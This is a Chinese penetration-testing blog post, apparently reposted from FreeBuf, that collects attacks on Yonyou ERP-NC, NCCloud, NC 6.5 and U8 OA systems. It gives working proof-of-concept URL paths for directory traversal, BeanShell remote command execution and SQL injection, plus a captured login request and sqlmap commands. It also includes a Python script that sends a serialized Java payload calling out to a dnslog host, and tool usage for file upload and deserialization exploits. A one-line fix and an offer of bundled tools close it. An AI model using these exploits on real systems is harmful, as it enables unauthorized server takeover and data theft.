渗透测试 | 用友各种漏洞整理 – 作者:宸极实验室Sec

介绍:前段时间参加攻防演练的时候,发现目标系统有很多都使用了用友的产品,故整理一篇关于用友漏洞的文章。

0x01 用友ERP-NC目录遍历漏洞

1.1 漏洞描述

用友ERP-NC存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息

1.2 漏洞复现

poc

/NCFindWeb?service=IPreAlertConfigService&filename=

图片[1]-渗透测试 | 用友各种漏洞整理 – 作者:宸极实验室Sec-安全小百科

0x02 用友NC bsh.servlet.BshServlet远程命令执行漏洞

2.1 漏洞描述

用友NC bsh.servlet.BshServlet存在远程命令执行漏洞,通过BeanShell执行远程命令获取服务器权限。

2.2 漏洞复现

poc:

/servlet/~ic/bsh.servlet.BshServlet

图片[2]-渗透测试 | 用友各种漏洞整理 – 作者:宸极实验室Sec-安全小百科

0x03 用友NCCloud FS文件管理SQL注入

3.1 漏洞描述

用友NCCloud FS文件管理登录页面对用户名参数没有过滤,存在SQL注入

3.2 漏洞复现

nccloud登录界面:

图片[3]-渗透测试 | 用友各种漏洞整理 – 作者:宸极实验室Sec-安全小百科

文件服务器管理登录页面:

http://xxx.xxx.xxx.xxx/fs/

图片[4]-渗透测试 | 用友各种漏洞整理 – 作者:宸极实验室Sec-安全小百科

抓取登录数据包:

GET /fs/console?username=admin&password=%2Bz3VgEDJpVuEHdRPPzbCFTCa9Q0sKLOZ5q4ZLhxjuok%3D HTTP/1.1
Host: xxx.xxx.xxx.xxx:xxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Referer: http://xxx.xxx.xxx.xxx:xxxx/fs/
Cookie: JSESSIONID=1591C393D0A5D165A1D3FCBDE19E1426.server; JSESSIONID=923588EF04C38332C5E907DB6DCF1B00.server
Upgrade-Insecure-Requests: 1

sqlmap跑注入:

sqlmap -r 1.txt -p username

-w1200

0x04 用友NC 6.5未授权文件上传漏洞

4.1 漏洞描述

用友NC6.5版本存在未授权文件上传漏洞,攻击者可以未授权上传任意文件,进而获取服务端控制权限。

4.2 漏洞复现

nccloud登录页面:

图片[6]-渗透测试 | 用友各种漏洞整理 – 作者:宸极实验室Sec-安全小百科

设置本地代理:

-w632

zsh运行脚本:(脚本来源于tools,禁止利用于非法用途。)

python3 nc.py -u http://xxx.xxx.xxx.xxx:xxxx/

burp抓取本地数据包,黄色标记部分修改为上传的内容:

图片[8]-渗透测试 | 用友各种漏洞整理 – 作者:宸极实验室Sec-安全小百科

访问返回的链接:

图片[9]-渗透测试 | 用友各种漏洞整理 – 作者:宸极实验室Sec-安全小百科

0x05 用友NC XbrlPersistenceServlet反序列化

5.1 漏洞描述

已知用友NC6.5版本存在反序列化漏洞,攻击者可以执行系统命令,获取服务端权限。

5.2 漏洞复现

(1)利用一

漏洞URL:

/service/~xbrl/XbrlPersistenceServlet

利用脚本:

import requests
import threadpool
import urllib3
import sys
import base64

ip = "x.x.x.x"
dnslog = "*****" #dnslog把字符串转16进制替换该段,测试用的ceye.io可以回显
data = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x73\x72\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x96\x25\x37\x36\x1a\xfc\xe4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6f\x64\x65\x49\x00\x04\x70\x6f\x72\x74\x4c\x00\x09\x61\x75\x74\x68\x6f\x72\x69\x74\x79\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x04\x66\x69\x6c\x65\x71\x00\x7e\x00\x03\x4c\x00\x04\x68\x6f\x73\x74\x71\x00\x7e\x00\x03\x4c\x00\x08\x70\x72\x6f\x74\x6f\x63\x6f\x6c\x71\x00\x7e\x00\x03\x4c\x00\x03\x72\x65\x66\x71\x00\x7e\x00\x03\x78\x70\xff\xff\xff\xff\x00\x00\x00\x50\x74\x00\x11"+dnslog+"\x3a\x38\x30\x74\x00\x00\x74\x00\x0e"+dnslog+"\x74\x00\x04\x68\x74\x74\x70\x70\x78\x74\x00\x18\x68\x74\x74\x70\x3a\x2f\x2f"+dnslog+"\x3a\x38\x30\x78"

uploadHeader={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
req = requests.post("http://+"ip"+/service/~xbrl/XbrlPersistenceServlet", headers=uploadHeader, verify=False, data=data, timeout=25)
print (req.text)

(2)利用二

usage

java -jar nc6.5.jar [target] [command]

-w1204

0x06 用友U8 OA``SQL注入漏洞

6.1 漏洞描述

用友U8 OA test.jsp文件存在SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞。

6.2 漏洞复现

登录界面:

-w682

poc:

/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))

图片[12]-渗透测试 | 用友各种漏洞整理 – 作者:宸极实验室Sec-安全小百科

-w1190

整改方案

升级到最新版本,时刻关注官网的补丁。

作者:goout

关注公众号,后台回复 『0712-用友』,获取打包好的所有工具

来源:freebuf.com 2021-07-12 15:13:31 by: 宸极实验室Sec

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论